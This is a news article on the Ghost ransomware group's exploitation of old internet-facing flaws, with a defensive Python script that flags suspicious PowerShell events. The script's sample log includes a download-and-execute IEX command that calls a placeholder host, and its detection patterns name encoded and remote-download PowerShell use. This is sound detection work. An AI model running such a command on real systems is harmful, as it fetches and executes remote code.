Unknown Chinese ransomware gang raids dozens of companies using old flaws


The hackers are attacking from China, compromising organizations via outdated internet-facing services. Their motivation is money, but little is known about them otherwise.

The US authorities have shed some light on the mysterious Ghost ransomware ring, also known by many other names: Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.

Most ransomware trackers don’t include the Ghost name – they seemingly don’t even have a victim site on the dark web. Yet the little-known hackers from China could’ve made a criminal fortune.


Their tactics are straight from the playbook: take a known flaw with publicly available exploit code, look for vulnerable services online, and profit. Even their tools are open source and widely available.

Exploiting vulnerabilities identified 3-14 years ago, Ghost hackers from China have compromised organizations in over 70 countries since early 202. Some of their entry points, such as Adobe ColdFusion flaws, were patched back in 2009 and 2010.

“Ghost actors, located in China, conduct these widespread attacks for financial gain,” the FBI, CISA, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) said in the joint advisory.

“Ghost actors exploit well-known vulnerabilities and target networks where available patches have not been applied.”

Ghost indiscriminately hacked schools, hospitals, critical infrastructure, religious institutions, manufacturing companies, numerous small and medium-sized businesses, and others whose internet-facing services ran outdated software and firmware versions.

Changing faces is their strategy. Ghost actors rotate their executables, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses to hide their tracks, leading to variable attribution of this group over time.

Sticking to what works

While some companies don’t fix what ain’t broken, Ghost breaks what ain’t fixed. They look for vulnerable FortiOS appliances and servers running Adobe ColdFusion, Microsoft SharePoint, or Microsoft Exchange.


When they find an open door, they upload a malicious web shell that downloads and executes other tools, such as Cobalt Strike. Cobalt Strike is a commercially available adversary simulation tool often used to test organizations' security controls, but it is also widely abused by threat actors.

Ghost isn’t focused on maintaining persistence – it typically spends only a day or two on the victim’s network before it’s done. The threat actor uses multiple open-source tools for privilege escalation, such as SharpZeroLogon, SharpGPPPass, BadPotato, and GodPotato.

“Ghost ransom notes often claim exfiltrated data will be sold if a ransom is not paid. However, Ghost actors do not frequently exfiltrate a significant amount of information or files, such as intellectual property or personally identifiable information (PII), that would cause significant harm to victims if leaked,” the advisory reads.

The various encryption executables shared similar functionality and were named Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe. The hackers used dozens of email addresses in their ransom notes but recently switched to the Tox protocol for communication with victims.

So, how do we protect ourselves against these ghosts? As always, following a minimum set of best cybersecurity practices is the first step.

“Patch known vulnerabilities by applying timely security updates to operating systems, software, and firmware within a risk-informed timeframe,” the authorities urge.

Other recommendations include maintaining system backups, segmenting networks, requiring phishing-resistant multi-factor authentication, and monitoring for unauthorized use of PowerShell.
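The last recommendation, monitoring for unauthorized use of PowerShell, is the one most easily turned into detection logic. Below is an added example (not from the advisory or the article) that triages PowerShell script-block events (Event ID 4104) from constructed, JSON-serialised log lines, flagging script blocks run by accounts outside an assumed approved list and blocks that download-and-execute or use encoded commands, the kind of behaviour a web shell dropping further tools would produce. The account names, hostnames, URL, and indicator patterns are assumptions for the demonstration.

```python
import json
import re
from dataclasses import dataclass, field

# Assumption: only these accounts are approved to run PowerShell on servers.
APPROVED_ACCOUNTS = {r"CORP\svc-patching", r"CORP\admin-jdoe"}

# Assumed indicators of download-and-execute or obfuscated use; tune per environment.
SUSPICIOUS_PATTERNS = (
    (r"-enc(odedcommand)?\s", "encoded command"),
    (r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", "remote download"),
    (r"\bIEX\b|Invoke-Expression", "dynamic invocation"),
)

@dataclass
class Alert:
    host: str
    user: str
    reasons: list = field(default_factory=list)

def parse_event(line):
    """Parse one JSON-serialised Windows event; return None unless it is a 4104 script block."""
    ev = json.loads(line)
    return ev if ev.get("EventID") == 4104 else None

def triage(lines, approved=APPROVED_ACCOUNTS):
    """Return one Alert per 4104 event that is unauthorized or matches a suspicious pattern."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        reasons = []
        if ev["User"] not in approved:
            reasons.append("account not approved for PowerShell")
        for pattern, label in SUSPICIOUS_PATTERNS:
            if re.search(pattern, ev["ScriptBlockText"], re.IGNORECASE):
                reasons.append(label)
        if reasons:
            alerts.append(Alert(ev["Computer"], ev["User"], reasons))
    return alerts

# Constructed sample log lines (not real telemetry); the URL host is a placeholder.
SAMPLE_LOG = [json.dumps(e) for e in (
    {"EventID": 4104, "Computer": "DC01", "User": r"CORP\svc-patching",
     "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"},
    {"EventID": 4104, "Computer": "WEB01", "User": r"CORP\websvc",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://PLACEHOLDER/a.ps1')"},
    {"EventID": 4104, "Computer": "APP02", "User": r"CORP\admin-jdoe",
     "ScriptBlockText": "powershell.exe -enc QQBCAEMA"},
    {"EventID": 4103, "Computer": "WEB01", "User": r"CORP\websvc", "ScriptBlockText": "whoami"},
)]

if __name__ == "__main__":
    for a in triage(SAMPLE_LOG):
        print(f"{a.host} {a.user}: {', '.join(a.reasons)}")
```

Running it reports the web server script block on three counts (unapproved account, remote download, dynamic invocation) and the approved admin's encoded command on one, while the benign service query and the non-4104 event are ignored.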

The authorities do not encourage paying ransoms as this doesn’t guarantee file recovery and also emboldens hackers to target additional organizations.
